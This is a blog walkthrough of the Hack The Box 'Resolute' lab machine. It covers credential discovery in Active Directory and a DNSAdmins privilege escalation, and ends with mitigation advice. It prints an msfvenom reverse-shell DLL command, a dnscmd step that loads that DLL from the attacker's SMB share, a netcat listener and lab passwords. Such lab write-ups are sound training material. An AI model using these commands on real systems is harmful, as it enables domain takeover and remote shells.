Hackthebox: Resolute Walkthrough

Hackthebox: Resolute Walkthrough

Hey fellow hackers!
The post will be guiding you on how to own resolute from Hackthebox.

Resolute is an easy rated machine. The box has a very straightforward initial foothold. But owning the administrator is a bit tricky.
It depicts another instance of an AD group membership privilege escalation.

So let’s get started!!

Run the nmap scan to retrieve all the open ports, services running.

# nmap -sC -sV -oA resolute.namp 10.10.10.169

The nmap results show various open smb, ldap. A useful service for us can be smb. So let’s do some basic enumeration.

Since there were no public shares available, i ran enum4linux to enumerate users. And voila!!, found a lot of users. In enumeration, I saw that the user marko is written his password in the description. An easy win!!

I tried evil-winrm on the creds obtained, but it didn’t seem to work. So I made a list of all the users and passed it through crackmapexec and guess what.. User melanie had the same password as marko!

Again i tried, evil-winrm on the creds of melanie and yes I got the user shell and the user.txt by running the command

# evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!
# cd C:\Users\melanie\Desktop
# type user.txt

Along with user melanie, ryan was also present on the box, but didnt had its access. So lets find out its creds.

Finding the creds for ryan

After getting the user flag, I jumped over to C:\  to enumerate further. Ran a dir but found nothing interesting. 

Then i added -force switch to grab hidden files too.

> dir -force

And the command revealed a lot of hidden files

I looked into each file. The content of the file PStranscripts revealed interesting information : creds of another user ryan!!

Note : From Ms Docs, transcripts records all or part of powershell session into a text file. The transcript containes everything that user types along with the output of the console.

So i opened up another evil-winrm session with the creds of ryan and ran whoami /all . 

# evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!

> whoami /all
/allDisplays all information in the current access token, including the current user name, security identifiers (SID), privileges, and groups that the current user belongs to.

The output shows that ryan is a member of DNSAdmins and we can perform a privilege escalation on DNSAdmin to become Doman Admins.

This attack relies on the malicious dll injection into the dns service that runs as SYSTEM on the dns server. The dll contains the reverse tcp code.

According to Microsoft protocol specification, performing “ServerLevelPluginDll” operation enables us to load a dll of our choice (without path verification of dll).
When user as dnsadmin executes dnscmd.exe (utility to manage dns servers) following registry key gets populated
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll

ServerLevelPluginDll: An absolute pathname of a dynamic link library that the DNS server can use to resolve unknown names, or an empty string to remove or disable the previously selected DLL. This protocol only treats the pathname as a string, it does not constrain the syntax in any way.

  1. So as a very first step, a payload has to be created on which we can get the reverse shell.

The payload(dll) can be created using msfvenom as :

# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.160 LPORT=4444 --platform=windows -f dll > plugin.dll

(Change the LHOST to the ip of your attacking machine)

2. Now we have a setup a smbserver so that the payload(plugin.dll) can be uploaded to the victim.

There is a script smbserver.py by impacket that can be used for the same.

#smbserver.py SHARE /root/Desktop/htb/resolute

SHARE : name of the share
/root/Desktop/htb/resolute : Path of the files you want to share with smb

To check if the victim is able to access the SHARE, run

net view \\10.10.14.160(your_smb_server_ip)

As we have our payload uploaded, the following command can be run on the victim, that injects our payload in the dnsserver.

Also the dns service has to be stopped and start again so that the plugin.dll (payload) is loaded.

# dnscmd.exe /config /serverlevelplugindll \\10.10.14.160\SHARE\plugin.dll
# sc.exe stop dns

Open up a netcat listener on the host machine

# nc -lnvp 4444

And then run the following command on the target machine

# sc.exe start dns

As the malicious dll gets loaded into the dns server, we get a shell

And we are Admininstrator!!

Root.txt can be found in C:\Users\Administrator\Desktop\root.txt

Looking for mitigations for the above vulnerable scenerios ??
Here is what you should do!!

  • The AD user passwords should not be stored in the description, when the user is created.
  • The file PSTranscripts where we found the creds of ryan should be readable only by the administrators
  • To prevent privilege escalation from DNS Admin to Domain Admin, only administrator should be a member of DNSAdmins.
  • Only privileged computers/groups should be able to access the Domain Controller over RPC.
  • Regularly review the DNS server object permissions for any group/account that shouldn’t have privileged access.

shreyapohekar

I’m Shreya Pohekar, a Senior Product Security Analyst at HackerOne. I enjoy sharing my thoughts and insights through blogging, turning complex security topics into engaging and accessible content for my readers.

Leave a Reply